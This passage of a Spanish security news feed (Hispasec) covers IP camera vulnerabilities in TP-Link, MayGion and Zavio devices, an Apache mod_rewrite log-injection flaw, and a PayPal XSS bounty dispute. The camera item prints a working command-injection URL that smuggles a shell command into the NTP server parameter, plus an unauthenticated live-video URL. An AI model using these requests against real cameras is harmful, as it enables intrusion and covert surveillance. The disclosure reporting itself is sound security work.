&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;resp &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; conn&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;getresponse&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;()&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;data &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; resp&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;read&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;()&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;conn&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;close&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;()&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Las vulnerabilidades han sido comprobadas en dispositivos con firmware v09.27 ó 2011.27.09, aunque otras versiones también podrían verse afectadas.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La respuesta del fabricante es que &lt;b&gt;las vulnerabilidades han sido corregidas&lt;/b&gt; en el firmware 2013.22.04.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-cKXw_FTuBJM/UaiNiWJDipI/AAAAAAAAClQ/vDNAaKEKKcs/s1600/Zavio_ip_camera.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-cKXw_FTuBJM/UaiNiWJDipI/AAAAAAAAClQ/vDNAaKEKKcs/s1600/Zavio_ip_camera.png" height="200" width="144" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Zavio F3105&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Por último, &lt;a href="http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities"&gt;los dispositivos del fabricante Zavio&lt;/a&gt; basados en el firmware v1.6.03 se ven afectados por las cuatro vulnerabilidades siguientes:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2567"&gt;CVE-2013-2567&lt;/a&gt;: un atacante remoto podría utilizar los credenciales fijados en el fichero de configuración '&lt;i&gt;boa.conf&lt;/i&gt;' para acceder a la interfaz web de administración.&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2568"&gt;CVE-2013-2568&lt;/a&gt;: un error de falta de comprobación de parámetros de entrada en '&lt;i&gt;/cgi-bin/mft/wireless_mft.cgi&lt;/i&gt;' podría permitir la inyección de comandos de forma remota.&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2569"&gt;CVE-2013-2569&lt;/a&gt;: un atacante remoto no autenticado podía tener acceso al vídeo en tiempo real.&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2570"&gt;CVE-2013-2570&lt;/a&gt;: una inyección de comandos en la función '&lt;i&gt;sub_C8C8&lt;/i&gt;' localizada en /opt/cgi/view/param.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;st1:personname productid="La PoC" w:st="on"&gt;La PoC&lt;/st1:personname&gt; de los dispositivos TP-Link es aplicable a la vulnerabilidad &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2568"&gt;CVE-2013-2568&lt;/a&gt;.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Además, con la siguiente URL un atacante remoto no autenticado podía tener acceso al flujo de vídeo en directo (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2569"&gt;CVE-2013-2569&lt;/a&gt;):&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-family: Courier;"&gt;rtsp://DIRECCIÓN_IP/video.h264&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La última PoC es una inyección de comandos (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2570"&gt;CVE-2013-2570&lt;/a&gt;) a través del parámetro General.Time.NTP.Server que permite obtener una lista completa de puntos de acceso ejecutando el comando '&lt;i&gt;/sbin/awpriv ra0 get_site_survey&lt;/i&gt;':&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://xn--direccin_ip-web/cgi-bin/admin/param?action=update&amp;amp;General.Time.DateFormat=ymd&amp;amp;General.Time.SyncSource=NTP&amp;amp;General.Time.TimeZone=GMT-06:00/America/Mexico_City&amp;amp;General.Time.NTP.ServerAuto=no&amp;amp;General.Time.NTP.Server=sarasa%21de%21palermo;/sbin/awpriv%20ra0%20get_site_survey;&amp;amp;General.Time.NTP.Update=01:00:00&amp;amp;General.Time.DayLightSaving.Enabled=on&amp;amp;General.Time.DayLightSaving.Start.Type=date&amp;amp;General.Time.DayLightSaving.Stop.Type=date&amp;amp;General.Time.DayLightSaving.Start.Month=01&amp;amp;General.Time.DayLightSaving.Stop.Month=01&amp;amp;General.Time.DayLightSaving.Start.Week=1&amp;amp;General.Time.DayLightSaving.Stop.Week=1&amp;amp;General.Time.DayLightSaving.Start.Day=01&amp;amp;General.Time.DayLightSaving.Stop.Day=01&amp;amp;General.Time.DayLightSaving.Start.Date=01&amp;amp;General.Time.DayLightSaving.Stop.Date=01&amp;amp;General.Time.DayLightSaving.Start.Hour=00&amp;amp;General.Time.DayLightSaving.Stop.Hour=00&amp;amp;General.Time.DayLightSaving.Start.Min=00&amp;amp;General.Time.DayLightSaving.Stop.Min=00&amp;amp;Image.OSD.Enabled=off"&gt;http://DIRECCIÓN_IP/cgi-bin/admin/param?action=update&amp;amp;General.Time.DateFormat=ymd&amp;amp;General.Time.SyncSource=NTP&amp;amp;General.Time.TimeZone=GMT-06:00/America/Mexico_City&amp;amp;General.Time.NTP.ServerAuto=no&amp;amp;General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&amp;amp;General.Time.NTP.Update=01:00:00&amp;amp;General.Time.DayLightSaving.Enabled=on&amp;amp;General.Time.DayLightSaving.Start.Type=date&amp;amp;General.Time.DayLightSaving.Stop.Type=date&amp;amp;General.Time.DayLightSaving.Start.Month=01&amp;amp;General.Time.DayLightSaving.Stop.Month=01&amp;amp;General.Time.DayLightSaving.Start.Week=1&amp;amp;General.Time.DayLightSaving.Stop.Week=1&amp;amp;General.Time.DayLightSaving.Start.Day=01&amp;amp;General.Time.DayLightSaving.Stop.Day=01&amp;amp;General.Time.DayLightSaving.Start.Date=01&amp;amp;General.Time.DayLightSaving.Stop.Date=01&amp;amp;General.Time.DayLightSaving.Start.Hour=00&amp;amp;General.Time.DayLightSaving.Stop.Hour=00&amp;amp;General.Time.DayLightSaving.Start.Min=00&amp;amp;General.Time.DayLightSaving.Stop.Min=00&amp;amp;Image.OSD.Enabled=off&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El fabricante Zavio no se ha pronunciado al respecto de las vulnerabilidades que afectan a sus dispositivos.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
TP-Link IP Cameras Multiple Vulnerabilities&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities"&gt;http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
MayGion IP Cameras multiple vulnerabilities&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities"&gt;http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Zavio IP Cameras multiple vulnerabilities&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities"&gt;http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Juan José Ruiz&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:jruiz@hispasec.com"&gt;jruiz@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/hdag0zlJOzI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/hdag0zlJOzI/multiples-vulnerabilidades-en.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-BMzw9u7VhXM/UaiL5n3DpaI/AAAAAAAACk4/4J6oqQqdGAw/s72-c/TP-Link_TL-SC3130G-01.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/05/multiples-vulnerabilidades-en.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-2758787143178442417</guid><pubDate>Thu, 30 May 2013 12:45:00 +0000</pubDate><atom:updated>2013-05-30T14:50:10.831+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">Apache</category><title>Ejecución de comandos en Apache Web Server</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://svn.apache.org/viewvc/httpd/httpd/branches/2.2.x/STATUS?view=markup&amp;amp;pathrev=1469311" style="font-size: 13pt;"&gt;Apache ha corregido un fallo de seguridad&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt; que &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;podría permitir a un atacante ejecutar comandos&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; si los inyecta previamente en los logs (lo que se consigue simplemente realizando peticiones HTTP especialmente manipuladas).&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-lQGOdsJwRC8/T8vqZ7LJC1I/AAAAAAAAAiI/AAPmmOuiVNY/s1600/Apache.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-lQGOdsJwRC8/T8vqZ7LJC1I/AAAAAAAAAiI/AAPmmOuiVNY/s1600/Apache.png" height="87" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;El fallo se encuentra en el módulo mod_rewrite&lt;/b&gt; del servidor web Apache, que no filtra ciertos caracteres y por tanto podría permitir la ejecución de código arbitrario de forma remota si un atacante deja comandos en los logs y luego son interpretados en consola.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
mod_rewrite es un módulo del servidor web Apache que permite reescribir las URL solicitadas sobre la marcha basándose en reglas. Dichas reglas de reescritura pueden ser invocadas desde los ficheros '&lt;i&gt;httpd.conf&lt;/i&gt;' de forma global o '&lt;i&gt;.htaccess&lt;/i&gt;' en cada directorio. mod_rewrite es ampliamente utilizado para crear direcciones URL alternativas para las páginas dinámicas de forma que resulten más legibles, fáciles de recordar por los usuarios, y también mejor indexadas por los motores de búsqueda o buscadores.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Joe Orton ha descubierto que la función '&lt;i&gt;do_rewritelog&lt;/i&gt;', localizada en el fichero '&lt;i&gt;modules/mappers/mod_rewrite.c&lt;/i&gt;', no filtra adecuadamente los caracteres no imprimibles cuando escribe los datos en el archivo de registro (logs). Si se usa la directiva RewriteLog, &lt;b&gt;un atacante remoto podría aprovechar este fallo para ejecutar comandos arbitrarios a través de peticiones HTTP especialmente manipuladas&lt;/b&gt;. Por ejemplo, que contengan una secuencia de escape para un terminal si los archivos de logs son mostrados.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-AxmLebLi6VA/UadKNsegeFI/AAAAAAAACko/NK7hWboymyk/s1600/Apache_vuln_mod_rewrite.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-AxmLebLi6VA/UadKNsegeFI/AAAAAAAACko/NK7hWboymyk/s1600/Apache_vuln_mod_rewrite.png" height="535" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La vulnerabilidad, &lt;a href="http://people.apache.org/~jorton/mod_rewrite-CVE-2013-1862.patch"&gt;identificada como CVE-2013-1862&lt;/a&gt;, afecta a la versión del servidor Apache 2.2.24, aunque también podrían estar comprometidas versiones anteriores. &lt;b&gt;En la versión 2.2.25 ha sido corregida.&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
APACHE 2.2 STATUS&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://svn.apache.org/viewvc/httpd/httpd/branches/2.2.x/STATUS?view=markup&amp;amp;pathrev=1469311"&gt;http://svn.apache.org/viewvc/httpd/httpd/branches/2.2.x/STATUS?view=markup&amp;amp;pathrev=1469311&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
mod_rewrite-CVE-2013-1862.patch&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://people.apache.org/~jorton/mod_rewrite-CVE-2013-1862.patch"&gt;http://people.apache.org/~jorton/mod_rewrite-CVE-2013-1862.patch&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Juan José Ruiz&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:jruiz@hispasec.com"&gt;jruiz@hispasec.com&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/OlbUNSi5D_w" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/OlbUNSi5D_w/ejecucion-de-comandos-en-apache-web.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-lQGOdsJwRC8/T8vqZ7LJC1I/AAAAAAAAAiI/AAPmmOuiVNY/s72-c/Apache.png" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/05/ejecucion-de-comandos-en-apache-web.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-2512781553185406503</guid><pubDate>Wed, 29 May 2013 13:00:00 +0000</pubDate><atom:updated>2013-05-29T17:47:47.254+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">PayPal</category><category domain="http://www.blogger.com/atom/ns#">Cross-site scripting</category><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">XSS</category><title>Paypal no paga por un fallo de seguridad descubierto por un chico de 17 años</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 13pt;"&gt;Robert Kugler, un alemán de 17 años, ha descubierto &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;un grave fallo de seguridad en Paypal&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;. La empresa, lejos de recompensar al estudiante a través de su programa oficial de caza de bugs, le "&lt;/span&gt;&lt;i style="font-size: 13pt;"&gt;descalificó&lt;/i&gt;&lt;span style="font-size: 13pt;"&gt;" después de haber reportado el fallo, que finalmente ha hecho público. No es el primer desliz de Paypal con respecto a los investigadores.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Robert Kugler ha descubierto &lt;b&gt;un clásico problema de Cross Site Scripting en el buscador de Paypal&lt;/b&gt;. En una web de esta categoría, un XSS puede resultar extremadamente serio, puesto que permitiría a atacantes engañar a los usuarios de una manera mucho más sofisticada.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-iYh-72_U68k/UaTiqT-zczI/AAAAAAAACkI/9Nb01xecfYI/s1600/xss-paypal.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-iYh-72_U68k/UaTiqT-zczI/AAAAAAAACkI/9Nb01xecfYI/s1600/xss-paypal.png" height="343" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;a href="http://picturepush.com/public/13144090" style="text-align: justify;"&gt;&lt;span style="font-size: x-small;"&gt;http://picturepush.com/public/13144090&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Kugler quiso acogerse al programa de recompensas de Paypal, que anima a la investigación responsable de vulnerabilidades premiando económicamente a los usuarios que encuentren fallos de seguridad. Así motivan un uso responsable de las vulnerabilidades. Mozilla, Google y otros agentes externos que funcionan como intermediarios, actúan de esta forma con éxito desde que se pusiera de moda hace unos años.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Kluger recibió sin embargo un email afirmando que &lt;b&gt;su descubrimiento no optaba al premio por tener 17 años&lt;/b&gt;. Finalmente &lt;a href="http://seclists.org/fulldisclosure/2013/May/163"&gt;ha publicado el problema en Full Disclosure&lt;/a&gt;, quejándose de la situación. Kluger afirma que la respuesta de Paypal fue:&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span lang="EN-GB"&gt;"&lt;i&gt;To be eligible for the Bug Bounty Program, you must not: ... Be less than 18 years of age. If PayPal discovers that a researcher does not meet any of the criteria above, PayPal will remove that researcher from the Bug Bounty Program and disqualify them from receiving any bounty payments.&lt;/i&gt;" &lt;/span&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Pero parece que esto le fue comunicado en privado, puesto que públicamente no se pueden encontrar fácilmente esas restricciones en ninguna página oficial de Paypal ni &lt;b&gt;parece que nunca se haya impuesto públicamente esta restricción.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;El investigador en desventaja&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Poner restricciones a la entregas de premios después de haber recibido la información es una práctica que, cuando menos, coloca al investigador en desventaja. No conoce las reglas del juego completas hasta que ha enseñado sus cartas (el código vulnerable) a la compañía. Esta, que ya puede arreglar el fallo (en última instancia, es lo que les interesa), decide entonces que los menores de edad no pueden recibir un premio.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;a href="http://4.bp.blogspot.com/-y1O4ElA33Pk/UaTj_7f8M6I/AAAAAAAACkY/mreoq_Fv-_c/s1600/paypal_logo.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-y1O4ElA33Pk/UaTj_7f8M6I/AAAAAAAACkY/mreoq_Fv-_c/s1600/paypal_logo.PNG" /&gt;&lt;/a&gt;Si se tratase de una cuestión legal, existen innumerables formas de sortear el inconveniente, como pedir permiso a sus tutores legales o compensar de otras formas. Pero la realidad es que se ha rechazado a la persona que encuentra un fallo que perfectamente encaja en la dinámica y reglas propuestas por Paypal, por una cuestión "&lt;i&gt;menor&lt;/i&gt;" como es la edad... y esto deja en clara desventaja al usuario y da muy mala imagen a Paypal, que &lt;b&gt;no es la primera vez que se ve criticada por otros aspirantes a la recompensa&lt;/b&gt;. Se han conocido otros problemas sufridos por investigadores para que la compañía realmente les pague por sus vulnerabilidades.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Otras empresas como Mozilla, &lt;a href="http://news.cnet.com/8301-17852_3-20020534-71.html"&gt;llegaron a pagar 3.000 dólares a un chico de 12 años&lt;/a&gt; por encontrar un grave fallo de seguridad en el navegador. &lt;a href="http://news.cnet.com/8301-27080_3-57369971-245/teen-finds-bugs-in-google-facebook-apple-microsoft-code/"&gt;Cim Stordal, de 15 años, ha descubierto ya fallos en Facebook, Chrome...&lt;/a&gt; y en la mayoría de los programas ha sido aceptado y recompensado.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
